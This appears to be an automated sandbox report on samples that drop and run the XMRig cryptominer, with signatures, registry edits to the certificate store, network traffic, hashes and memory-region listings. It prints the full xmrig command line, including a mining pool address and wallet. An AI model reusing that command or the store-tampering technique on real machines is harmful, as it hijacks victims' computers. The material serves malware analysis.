Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 113.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2804-16-0x000001BABCE30000-0x000001BABCE50000-memory.dmp

memory/2804-17-0x000001BABCE80000-0x000001BABCEA0000-memory.dmp

memory/2804-18-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-20-0x000001BABCEA0000-0x000001BABCEC0000-memory.dmp

memory/2804-19-0x000001BABE770000-0x000001BABE790000-memory.dmp

memory/2804-21-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-22-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-25-0x000001BABCEA0000-0x000001BABCEC0000-memory.dmp

memory/2804-24-0x000001BABE770000-0x000001BABE790000-memory.dmp

memory/2804-23-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-26-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-27-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-28-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-29-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-30-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-31-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-32-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-33-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-34-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-35-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-36-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-37-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-38-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-39-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-40-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-41-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-42-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-43-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-44-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-45-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-46-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-47-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-48-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-49-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-50-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-51-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-52-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-53-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-54-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-55-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-56-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-57-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-58-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-59-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-60-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-61-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-62-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-63-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-64-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-65-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-66-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-67-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-68-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-69-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-70-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-71-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-72-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-73-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-74-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-75-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-76-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-77-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-78-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-79-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-80-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-81-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-82-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-83-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

memory/2804-84-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:33

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1784s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.167.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1044-16-0x0000024836980000-0x00000248369A0000-memory.dmp

memory/1044-17-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-18-0x0000024836BE0000-0x0000024836C00000-memory.dmp

memory/1044-19-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-21-0x0000024836C20000-0x0000024836C40000-memory.dmp

memory/1044-20-0x0000024836C00000-0x0000024836C20000-memory.dmp

memory/1044-22-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-23-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-24-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-25-0x0000024836C00000-0x0000024836C20000-memory.dmp

memory/1044-26-0x0000024836C20000-0x0000024836C40000-memory.dmp

memory/1044-27-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-28-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-29-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-30-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-31-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-32-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-33-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-34-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-35-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-36-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-37-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-38-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-39-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-40-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-41-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-42-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-43-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-44-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-45-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-46-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-47-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-48-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-49-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-50-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-51-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-52-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-53-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-54-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-55-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-56-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-57-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-58-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-59-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-60-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-61-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-62-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-63-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-64-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-65-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-66-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-67-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-68-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-69-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-70-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-71-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-72-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-73-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-74-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-75-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-76-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-77-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-78-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-79-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-80-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-81-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-82-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-83-0x00007FF653D20000-0x00007FF654823000-memory.dmp

memory/1044-84-0x00007FF653D20000-0x00007FF654823000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240508-en

Max time kernel

1797s

Max time network

1786s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8